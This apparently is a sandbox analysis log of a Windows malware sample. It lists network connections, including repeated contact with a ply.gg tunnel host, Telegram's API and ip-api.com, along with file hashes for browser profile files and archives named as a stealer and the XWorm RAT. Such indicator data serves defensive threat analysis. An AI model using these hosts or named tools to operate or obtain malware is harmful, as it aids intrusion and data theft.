| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| BE | 88.221.83.248:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | telegram.org | udp |
| US | 8.8.8.8:53 | cdn4.cdn-telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 34.111.35.152:443 | cdn4.cdn-telegram.org | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.35.111.34.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| BE | 88.221.83.219:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 219.83.221.88.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.125.13:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.13:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 11.127.203.66.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.213.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | spotlights-feed.github.com | udp |
| US | 185.199.108.153:443 | spotlights-feed.github.com | tcp |
| GB | 216.58.213.14:443 | www.youtube.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.34:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| GB | 172.217.169.34:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.187.225:443 | yt3.ggpht.com | tcp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.180.250.142.in-addr.arpa | udp |
| GB | 142.250.179.230:443 | static.doubleclick.net | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | exmple.com | udp |
| US | 67.210.233.131:80 | exmple.com | tcp |
| US | 8.8.8.8:53 | 131.233.210.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.169.217.172.in-addr.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| NL | 149.154.167.99:443 | oauth.tg.dev | tcp |
| US | 8.8.8.8:53 | 175.108.111.34.in-addr.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| BE | 88.221.83.218:443 | www.bing.com | tcp |
| BE | 88.221.83.218:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 218.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 239.255.255.250:3702 | udp | |
| N/A | 239.255.255.250:3702 | udp | |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| N/A | 127.0.0.1:8001 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8001 | tcp | |
| N/A | 127.0.0.1:8001 | tcp | |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 67.210.233.131:80 | exmple.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ec7568123e3bee98a389e115698dffeb |
| SHA1 | 1542627dbcbaf7d93fcadb771191f18c2248238c |
| SHA256 | 5b5e61fe004e83477411dd2b6194e90591d36f2f145cc3b4faa20cf7ae266a75 |
| SHA512 | 4a53fbbd7281a1a391f0040f6ff5515cedf6e1f97f2dae4ab495b4f76eb4f929dcda6b347f9bf7f66a899330f8897e1ed117314945d1de27b035cc170fa447d3 |
\??\pipe\LOCAL\crashpad_1408_SIDRGULCYXCELXON
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a2b2c93b0e0147ba3bfab6787e75531c |
| SHA1 | b86a016830cc79f79ce376c89589d958a1329f33 |
| SHA256 | 017cabb371c7f86916a3a14b90d0044572d52134f3c2656f4c272a390c228df3 |
| SHA512 | 9b191f6cc7fe209861eb34312baa0cf3103518d217faaccc3eeaf2a98ee9b9ead8f9c55a2567ed30c3f3bf899df034a4fdf1b42d57d1ffd4acd347dae563d0de |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip
| MD5 | 7ab279d65fc88039691b88f55418c01e |
| SHA1 | 832945bca7b88ed4c71fdb41aaad4d3964a4d8ec |
| SHA256 | d12c8945721b71c972cb2f6180b768180a80419f113ab3f92fdfa640ba6d626d |
| SHA512 | 3af409ed630dd2d625a8b15c8afb72bc610a94590dc7bd57fd059ab555504faf8eb441b5d452eb7ceb73b3db72ca17ea8986c3ec9f75deafb409636b32bb70d0 |
C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5bbe7d5788b88b62263ebf7fcc22dcb8 |
| SHA1 | afb4b515dc959d322ed3d72153cb508f5735d0e0 |
| SHA256 | 007b0e7fa12c49e634d1bc0f2b3517236010cdfbea8acfe419d59c3677ac0584 |
| SHA512 | eabddf79d9d81cca00ea9a751525e0f074f35abb219ed564bf76946d35e4d684ae1c84c98e0db208558c9a78972f778faee46bd4940557d78bb15063c191facf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1e6857d0b7028739ffa41e90722129e8 |
| SHA1 | f858e879eb0fd16492778e1b21f4ae91eeb8cdce |
| SHA256 | 82a3d3a88c014536d5e55427e7cebe1c2f26c16a03b96680cbcd543f9dec4322 |
| SHA512 | 1e626e56c925054c984484b37e272b515b1aeccad31b2f6b409160f0820fed6840ed493dda42392094de5a64dd88a30483ba0d53fbe148be84d7587d6ca0e521 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 0ba15f72ffb0a37243558588d3e78221 |
| SHA1 | 814bdfffd723f7de9f8d6d6a0bc8d85a9f275cc0 |
| SHA256 | 3d0223e1f8bb35870db41872cfbbe467f65bf9a1208dcb4d4ad874e250ccc10a |
| SHA512 | 02b168ef9cc226a08955092173c3745a55b28faa438b8152acb90d3bc1d9f433de7d8341def8b452db1986392a59cabc7c69689ad00825c58371ca78021183be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d9b8c1f882ff65574e707668f8052e39 |
| SHA1 | 3c8f7a9775ff1af5b82e7f66497c810bc14c0805 |
| SHA256 | f18623dac929c1e4622e91b57a40318b8995ec7fa7de8f1e1fac9dd2fa5b98f5 |
| SHA512 | d7f0630ba99638b6618b39f2d0bd1887fbb00793c0eac0a10eaf57be5a4596427365987e7afda329c7b58f6d0829ea764ad8968807a0efd716500a3930be702b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5074e20188a773980812a6329527e342 |
| SHA1 | 0ecaeeb316298b5b59f7894769ee91997fffb346 |
| SHA256 | 9e147459533ab004a57528f8666d3897c92bd61c162748f506e9cb50c88068fc |
| SHA512 | 41981d5cf1ddbe706cbd85da59fed923d58ba5da3b037ad8c6f3e9f193fce821ecabefd5245ecffc12f21fbeba650e07cbf2590a46cbf7b1c57c3bb5507c6df2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58080a.TMP
| MD5 | de43feeb209fd6c67537a614267d6aac |
| SHA1 | 93381574b34f9fb11b30b5f80a87a0bfc7351bdc |
| SHA256 | 6a1851bc0d0268641a4acc0be85df0cf9f6e80fb6a79ef0ddcf4f76e333d876a |
| SHA512 | 49ed085666f62df08dae5eb6d76427fa35d666aa47a5f95b141fdaae1e1aa94ddd56d6b7d2e8746c012c959d7f49ece748cf3825fd991ae6eeb9f6e2fbec3c76 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f0d89aa56c19131cc011e24a1059c256 |
| SHA1 | 34afc1c883987b7c92c2d44e139c0a4c7b9d7fb8 |
| SHA256 | 91083e08bd45470a9b31954da4a31ff7c4827904cb706d1249648c0239451088 |
| SHA512 | 302e7d2871b94a46c0e0fd88ba75ebee951eeae3e04758e43bb6fedceaa470930d158d38d0b2d634953e169178522bd18fc489b0df81eb3094f9b7f4d4b75754 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6a9b8931fbda78df9e48a9817040a32c |
| SHA1 | cd34bc7f7d9a3f646cc1b49afdbfe84673da3899 |
| SHA256 | 739da4f032f53c21390ddd663d555c5021f1b27c9b68866049eeaa8298454e7a |
| SHA512 | eea67dd976661abde3693d3cf6971489fe4c6f067fe917d8b585bdf2dcee308c2622f122354e6796964181f84f9059a42c74932113b0696e597de184dd69d92f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 622ffa73ef846c9bdc47501ba539e5fb |
| SHA1 | 3b656b837012580b8f4f685364758a7025cdf88d |
| SHA256 | ea28f502e1685a8ed3b5c3275b118b3ed1705f7678a12e201b80f532398a8a28 |
| SHA512 | c27c2e9d62a0fed8612feb2f923236888b891a2868ca38e6f7325241c4e1b70fc6d78a5246674d32db1b7f35695a9142385e1df74e73226aa936368edc855909 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c269d71b514cc53e6c760a7eb56e4302 |
| SHA1 | 5c8e23c901797e46d39d590c070d654d4560a21e |
| SHA256 | 4106cb40a37cab081ec1c9db10c6c1faeeee97e2c488d5bd52b6b0d520b6237e |
| SHA512 | 61b45d9f7d9f623d5096ce603a87806b706a9a676fcbb21ad6df0692df3e04674a1f33ea186dc440d2a0f51ada36ef2469e9731f47d1e774c2b3b3ca8e4b35a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 01053c7f0e1896c374fb0832f8afb3c3 |
| SHA1 | c34085daa61329aa516016c83bddc7ebe1f35a52 |
| SHA256 | 41a4a0bef0ebb94fb2a3135d6d72827f2bba7838a1c282cf3bcc844e91b248e1 |
| SHA512 | acc1d0a5839f453960c9519b5d191b8c8160037c4f6bf16d2644f1629c807f92cbd7a8659bf1a74b49f4ca4908e797f0814a9e2ea81aadce36cfb9d1dfc5ed37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4e4f23bac2e71f8532e2a061126e1bf4 |
| SHA1 | c78a0b22cd95b17dc5d758676f19e998b1d20b98 |
| SHA256 | 1e37a6ce080a240913afb198c44964d6eeff861ffe2306c599e2955de93fca0e |
| SHA512 | b5db4b657cc201017dd9f00e50a72ad77a3f28e0dd1e2b346f9e065b7a84149e759c11e69a6d45ad1f09972b0904662110b0e4a95186d5a91de4aa7021388503 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c35b1f519f8e32cd2502449f4232a8db |
| SHA1 | 1d5ce075e9c34e17b2e6258092f1e10aca40e34b |
| SHA256 | 10cf1ffadf87d6d4a8268b697d2e18615f9290641d9c36988fc05c06ffa7c574 |
| SHA512 | c69881cdd387f2295972e331d8901e10921e7e6ed447352f298f22e39e621a757b4dc4cd13497380355d49b82acddf3325b1daf691f034fa90b33716aed0df1c |
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip
| MD5 | 88dfc456336a95ffeac16d9276083b7b |
| SHA1 | 8949c8c8778bd6412a456212d4ba2707f12e9d7a |
| SHA256 | edbdc2e1bed353b533761a069b2d9a563683318fd1657ce09f9be2fa8ccd497a |
| SHA512 | 988ec72613d155bc362b1c0e0f1ee731f9653947328084e96eb436e7576b8e9c5114e59488216ea4f05d48126c5dbd7e983a02a412755b59b961f15c3ceea5f5 |
memory/1184-560-0x0000000000780000-0x00000000009C2000-memory.dmp
memory/1184-561-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/1184-562-0x0000000005960000-0x0000000005F06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
